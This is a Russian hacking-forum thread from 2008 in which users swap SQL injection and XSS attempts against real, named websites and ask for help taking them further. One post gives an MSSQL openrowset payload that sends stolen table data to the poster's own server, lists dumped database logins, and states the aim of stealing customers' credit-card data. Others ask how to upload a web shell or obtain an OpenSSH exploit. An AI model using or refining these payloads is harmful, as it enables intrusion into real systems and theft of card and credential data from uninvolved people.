ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

25.04.2008, 18:20
|
|
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме: 1469161
Репутация:
142
|
|
http://www.donland.ru/news.asp?Id=1+or+1=(select+top+1+author+from+ssf_f orums)--
Выводит какую-то абракадабру.
Вот все таблицы, которые присутствуют на сервере: ).
dtproperties','ssgb2_groups','ssgb2_messages'%20,' ssgb2_messageGroups'%20,'ssgb3_groups'%20,'ssbx_ba nners'%20,'ssbx_clickLogs'%20,'ssf_forums','ssf_fo rumGroups'%20,'ssbx_showLogs','ssf_groups','ssf_me ssages','ssgb0_groups','ssgb0_messageGroups','ssgb 0_messages','ssgb1_groups','ssgb1_messageGroups',' ssgb1_messages','ssgb3_messageGroups','ssgb3_messa ges'%20,'ssis_nodes','ssm_groups','ssm_mailGroups' ,'ssm_mails','ssn_newGroups','ssn_news','ssv_answe rs','ssv_groups','ssv_voteGroups','ssv_votes','sys constraints','syssegments'.
Есть папка admin,в которую нипонятно, что вводить))))).Сомневаюсь, что в какой-то из этих папок есть что-то вроде админ или юзер ))\
Имя выводится как 'Âñå1',и чтойта ? )
Последний раз редактировалось Велемир; 25.04.2008 в 19:31..
|
|
|

25.04.2008, 21:02
|
|
Новичок
Регистрация: 29.03.2008
Сообщений: 7
Провел на форуме: 78255
Репутация:
0
|
|
Здравствуйте!
Нашёл mssql-иньекцию в одном интернет-магазинчике.
Выборку данных оттуда произвожу добавлением в строку запроса подобной штуки:
;insert+into+openrowset('sqloledb','uid=user3000;p wd=pass3000;network=DBMSSOCN;Address=777.777.103.4 ','select+line+from+base3000..tbltest')+select+tab le_name+from+information_schema.tables;--
Таким образом получаю данные на свой сервак. Страница просто перезагружается, данные заливаются ко мне, ошибки не происходит. Все довольны.
В текущей базе есть таблица Orders. В не хранится картон, но есть колонка CCOrderID. Я предполагаю, что картон хранится в другой таблице.
При заказе и оплате картон поля с реквизитами карты передаются в ccorder.asp.
Есть базы данных с именем cybersales. Думаю карты там.
Запрос select+table_name+from+cybersales.information_sche ma.tables не выполняется. Не просто не выдаёт результат на мой сервер, а именно не выполняется. Об этом я сужу по тому, что мне выдаётся HTTP 500 - Internal server error:The page cannot be displayed. А когда запрос корректно выполняется, то просто происходит перезагрузка страницы.
Видимо у текущего пользователя нет прав на просморт бд cybersales.
Делаю запрос select+name+from+master..syslogins. Получаю все логины. Есть cybersalesuser.
Запрос select+password+from+master..sysxlogins выполняется но ничего не выдаёт на мой сервер.
Каковы мой дальнейшие действия? Хочется добраться до картона. Спасибо!
Последний раз редактировалось cyberia; 25.04.2008 в 21:07..
|
|
|

25.04.2008, 21:28
|
|
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме: 17621293
Репутация:
4915
|
|
Давай так: ни о каком картоне мы не говорим,говорим о скуле(как вам конспирация?  )
Вот так не бывает:
"cybersales.information_schema.tables"
information_schema.tables содержит все таблицы всех баз эта запись означает БАЗА-information_schema,ТАБЛИЦА-tables
Если есть база с именем cybersales то её таблицы тоже будут в information_schema.tables, а доступ к ней через точку т.е. cybersales.ТАБЛИЦА
Если ты можешь выполнить master.. то прав на просмотр скорее всего хватит хотя не 100% конечно
|
|
|

25.04.2008, 22:00
|
|
Новичок
Регистрация: 29.03.2008
Сообщений: 7
Провел на форуме: 78255
Репутация:
0
|
|
Сообщение от jokester
Давай так: ни о каком картоне мы не говорим,говорим о скуле(как вам конспирация?  )
Вот так не бывает:
"cybersales.information_schema.tables"
information_schema.tables содержит все таблицы всех баз эта запись означает БАЗА-information_schema,ТАБЛИЦА-tables
Если есть база с именем cybersales то её таблицы тоже будут в information_schema.tables, а доступ к ней через точку т.е. cybersales.ТАБЛИЦА
Если ты можешь выполнить master.. то прав на просмотр скорее всего хватит хотя не 100% конечно
Кажется понял. Ты хочешь сказать, что по запросу select+table_name+from+information_schema.tables выводятся ВСЕ таблицы ВСЕХ баз данных? Не думаю я. Таблиц по этому запросу выводится штук 20. А баз дынных есть штук 45.
Последний раз редактировалось cyberia; 25.04.2008 в 22:12..
|
|
|

25.04.2008, 22:00
|
|
Познающий
Регистрация: 18.04.2008
Сообщений: 62
Провел на форуме: 279406
Репутация:
37
|
|
Помогите, пжста! )) на сайте была найдена уязвимость XSS типа если в адресную строку вбить http://site.ru/pages/index.php?=2//какой_то_текст , то все, что стоит после цифры 2 выводится как текст на странице! Вопрос: как это можно использовать? пробовал вставлять <? system($cmd); ?> - не работает.. Вообще конечно хотелось бы просмотреть конфигурационный файл в корне сайта что бы получить доступ к БД. Извините, возможно и глупый вопрос, я просто в этом новичек.. ))
Если вставить после 2 вот это <script>alert()</script> то алерт конечно срабатывает..
|
|
|

26.04.2008, 10:01
|
|
Познающий
Регистрация: 01.02.2007
Сообщений: 89
Провел на форуме: 1668307
Репутация:
114
|
|
Сообщение от Thrasher88
Помогите, пжста! )) на сайте была найдена уязвимость XSS типа если в адресную строку вбить http://site.ru/pages/index.php?=2//какой_то_текст , то все, что стоит после цифры 2 выводится как текст на странице! Вопрос: как это можно использовать? пробовал вставлять <? system($cmd); ?> - не работает.. Вообще конечно хотелось бы просмотреть конфигурационный файл в корне сайта что бы получить доступ к БД. Извините, возможно и глупый вопрос, я просто в этом новичек.. ))
Если вставить после 2 вот это <script>alert()</script> то алерт конечно срабатывает..
почитай вот эти статьи, найдешь много полезно про XSS:
https://forum.antichat.ru/showthread.php?t=11807
https://forum.antichat.ru/showthread.php?t=44125
https://forum.antichat.ru/showthread.php?t=42951
|
|
|

25.04.2008, 23:04
|
|
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме: 1469161
Репутация:
142
|
|
http://lasgy.tln.edu.ee/?smg=news&ca=2989+or+1%3D1+--+
Сканер показал слепую инъекцию,но у мя ничё не вышло тут. Наяба ? о_О
P.S. : Есть также дыра,позволяющая выполнить произвольный код в OpenSSH.тоже от сканера
Уязвимость существует из-за ошибки в процедуре обработки служебных сигналов. Уязвимость позволяет злоумышленнику аварийно завершить работу сервиса OpenSSH или выполнить произвольный код в системе. Для эксплуатации уязвимости необходимо чтобы сервис использовал GSSAPI аутентификацию (параметр GSSAPIAuthentication в файле конфигурации).
Прошу не бить за лог:Р,прост сплойта в нете не нашёл,а сам написать имхо не могу =_=(Знал бы не спрашивал =)).Есть у кого какие идеи ?)
Последний раз редактировалось Велемир; 25.04.2008 в 23:27..
|
|
|

26.04.2008, 12:31
|
|
Участник форума
Регистрация: 23.05.2007
Сообщений: 103
Провел на форуме: 380957
Репутация:
56
|
|
привет всем!
что делать если при таком запросе -9999+UNION+SELECT+1,2,user(),4/*
ну или место юзер датабэйс и.т.д. просто появляется чистый экран.
|
|
|

26.04.2008, 12:42
|
|
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме: 9098076
Репутация:
4303
|
|
ссылку
|
|
|

26.04.2008, 12:59
|
|
Познающий
Регистрация: 10.01.2008
Сообщений: 43
Провел на форуме: 97223
Репутация:
5
|
|
www.railway.dn.ua/ru/index.php?index=4&number=1'+union+select+1,2,3,4/* как найти полную директорию для записи файла и заливки шелла????
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|